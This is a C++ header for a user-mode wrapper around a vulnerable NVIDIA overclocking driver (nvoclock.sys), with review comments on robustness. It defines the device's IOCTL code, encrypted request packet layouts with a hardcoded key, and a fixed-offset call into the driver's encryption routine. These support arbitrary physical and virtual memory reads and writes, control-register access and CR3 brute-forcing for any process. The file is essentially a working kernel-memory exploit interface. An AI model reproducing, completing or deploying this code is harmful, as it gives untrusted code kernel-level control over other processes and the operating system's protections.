#pragma once
#include <Windows.h>
#include <iostream>
#include <tlhelp32.h>
/*
 * NVDrv: user-mode wrapper around the NVR0Internal device of nvoclock.sys.
 *
 * The constructor loads the driver image from a hardcoded path to locate
 * its payload-encryption routine at a fixed offset, then opens the device.
 * The member functions declared here are implemented elsewhere; only the
 * constructor and the Read/Write templates are defined in this header.
 *
 * NOTE(review): every failure path in the constructor calls exit(5000), so
 * constructing an NVDrv can terminate the whole process; callers cannot
 * recover from a missing file or a closed device.
 * NOTE(review): there is no destructor, so nvhandle is never closed and the
 * loaded module is never freed; both live until process exit.
 * NOTE(review): std::wstring, printf and exit are used below but <string>,
 * <cstdio> and <cstdlib> are not included directly; the header currently
 * relies on them arriving transitively through <iostream>/<Windows.h>.
 */
class NVDrv
{
public:
/*
 * IO call to driver for __readcrX() intrinsic where X = (int cr).
 * cr is presumably one of NVControlRegisters below — confirm against the
 * implementation.
 * NOTE(review): returns DWORD, mirroring the 32-bit `result` field of
 * request_readcr, while WriteCr takes a DWORD64; 64-bit register contents
 * cannot be returned through this interface unchanged.
 */
DWORD ReadCr(int cr);
/*
 * IO call to driver for __writecrX(value) intrinsic where X = (int cr).
 * Returns FALSE on failure.
 */
BOOL WriteCr(int cr, DWORD64 value);
/*
 * Gets the file path of a running process by name.
 */
std::wstring GetProcessPath(const std::wstring& process_name);
/*
 * Returns the base address of a running process by name.
 */
uintptr_t GetProcessBase(const std::wstring& process_name);
/*
 * Bruteforcing to get the directory base of a process from its base address.
 */
uintptr_t GetProcessCR3(uintptr_t base_address);
/*
 * Get system directory base by walking PROCESSOR_START_BLOCK.
 */
uintptr_t GetSystemCR3();
/*
 * IO call to driver for MmGetPhysicalAddress.
 */
uintptr_t MmGetPhysicalAddress(uintptr_t virtual_address);
/*
 * Translates linear/virtual addresses to physical addresses with the
 * currently selected directory base (see SwapReadContext).
 */
uintptr_t TranslateLinearToPhysicalAddress(uintptr_t virtual_address);
/*
 * IO call to driver for physical memory memcpy read via MmMapIoSpace.
 * IN/OUT are the empty annotation macros from <Windows.h>.
 * NOTE(review): size is a signed int; a negative value is not rejected here.
 */
BOOL ReadPhysicalMemory(uintptr_t physical_address, void* OUT res, int size);
/*
 * IO call to driver for physical memory memcpy write via MmMapIoSpace.
 */
BOOL WritePhysicalMemory(uintptr_t physical_address, void* IN res, int size);
/*
 * Read virtual memory via translating virtual addresses to physical addresses.
 */
BOOL ReadVirtualMemory(uintptr_t address, LPVOID output, unsigned long size);
/*
 * Write virtual memory via translating virtual addresses to physical addresses.
 */
BOOL WriteVirtualMemory(uintptr_t address, LPVOID data, unsigned long size);
/*
 * Swap reading context for TranslateLinearToPhysicalAddress.
 * Presumably stores target_cr3 (private member below) — confirm in the .cpp.
 */
BOOL SwapReadContext(uintptr_t target_cr3);
/*
 * Loads the driver image, resolves encrypt_payload and opens the device.
 * Terminates the process via exit(5000) if either step fails.
 */
NVDrv()
{
/*
 * Import the vulnerable driver into memory.
 * NOTE(review): absolute, hardcoded path; LoadLibraryW on a .sys maps the
 * image as a DLL so its bytes can be addressed from user mode.
 */
HMODULE nvoclock = LoadLibraryW(L"C:\\nvoclock.sys");
if (!nvoclock)
{
printf("nvoclock.sys not found at C: directory!\n");
exit(5000);
}
/*
 * Get the payload encryption function sub_2130.
 * NOTE(review): the 0x2130 offset is tied to one specific build of
 * nvoclock.sys; any other version of the file yields a pointer into
 * unrelated code with no check that it is even inside the image.
 */
encrypt_payload = (decltype(encrypt_payload))(__int64(nvoclock) + 0x2130);
/*
 * Open a handle to the driver.
 * NOTE(review): NULL is passed where CreateFileW takes a DWORD share mode
 * (0 = no sharing) and a HANDLE template; a literal 0 / nullptr would be
 * clearer. FILE_ATTRIBUTE_HIDDEN is passed as dwFlagsAndAttributes.
 */
this->nvhandle = CreateFileW(L"\\\\.\\NVR0Internal", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_HIDDEN, NULL);
if (this->nvhandle != INVALID_HANDLE_VALUE) {
printf("NVR0Internal Handle: %p\n", this->nvhandle);
}
else {
printf("Driver is not loaded!\n");
exit(5000);
}
}
/*
 * Read template for ReadVirtualMemory(): reads sizeof(T) bytes at address.
 * NOTE(review): returns NULL on failure, which is 0 for integral/pointer T
 * and does not compile for class-type T (`return T{};` would be the general
 * form). A failed read is therefore indistinguishable from a genuine zero.
 */
template<typename T>
T Read(uintptr_t address)
{
T buffer;
if (!ReadVirtualMemory(address, &buffer, sizeof(T)))
return NULL;
return buffer;
}
/*
 * Write template for WriteVirtualMemory(): writes sizeof(T) bytes of val
 * at address. Returns FALSE on failure, TRUE otherwise.
 */
template<typename T>
BOOL Write(uintptr_t address, T val)
{
if (!WriteVirtualMemory(address, (LPVOID)&val, sizeof(T)))
return FALSE;
return TRUE;
}
/*
 * Control register numbers accepted by ReadCr/WriteCr.
 */
enum NVControlRegisters {
CR0 = 0,
CR2 = 2,
CR3 = 3,
CR4 = 4
};
private:
/*
 * NOTE(review): this is a preprocessor macro, not a class member; the
 * `private:` label does not scope it and it leaks into every translation
 * unit that includes this header.
 */
#define DEBUG TRUE
/*
 * Control code for the NVR0Internal device; presumably used by the method
 * implementations (not in this header) when issuing requests.
 */
static int constexpr ioctl_code = 0x9C40A484;
/*
 * Request ids placed in the request_id field of the packets below.
 */
enum class NVFunction : int
{
read_cr = 0,
write_cr = 1,
phys_req = 0x26,
phys_read = 0x14,
phys_write = 0x15
};
/*
 * Empty base type for all request packets; encrypt_payload takes request*.
 * NOTE(review): the member order and the unk/unk_data padding of the derived
 * packets appear to mirror the layout the driver expects — do not reorder
 * or retype fields without checking the implementation.
 */
struct request { };
struct request_memcpy : request
{
NVFunction request_id;
int size;
__int64 dst_addr;
__int64 src_addr;
char unk[0x20];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
struct request_phys_addr : request
{
NVFunction request_id;
int unk_0;
__int64 result_addr;
__int64 virtual_addr;
int writevalue;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
struct request_readcr : request
{
NVFunction request_id;
int unk_0;
int cr_num;
int unk10;
int unk14;
int unk18;
int result;
char unk[0x20 - 4];
/*
 * NOTE(review): only this packet type carries a default packet_key; the
 * other packets leave it uninitialized here and presumably have it filled
 * by encrypt_payload or the caller — confirm in the .cpp. The trailing
 * `;;` is a harmless empty member declaration.
 */
unsigned __int64 packet_key[0x40 / 8] = { 12868886329971960498, 13552922889676271240, 10838534925730813900, 11819403095038824665,16047435637536096 ,10679697536739367056 ,18271467892729589711 ,6472933704646412218 };;
char unk_data[0x138 - 0x40 - 56];
};
struct request_writecr : request
{
NVFunction request_id;
int unk_0;
int cr_num;
int unk10;
int unk14;
int unk18;
int writevalue;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
/*
 * Payload-encryption routine resolved in the constructor at a fixed offset
 * of the loaded driver image. Parameter meanings are not documented here;
 * the names are those used by the constructor's comment only.
 */
void* (*encrypt_payload)(request* data_crypt, int, void* temp_buf) = nullptr;
/*
 * Device handle opened in the constructor. NOTE(review): never closed.
 */
HANDLE nvhandle = INVALID_HANDLE_VALUE;
/*
 * Directory base used for translation; presumably set by SwapReadContext().
 */
uintptr_t target_cr3 = 0;
};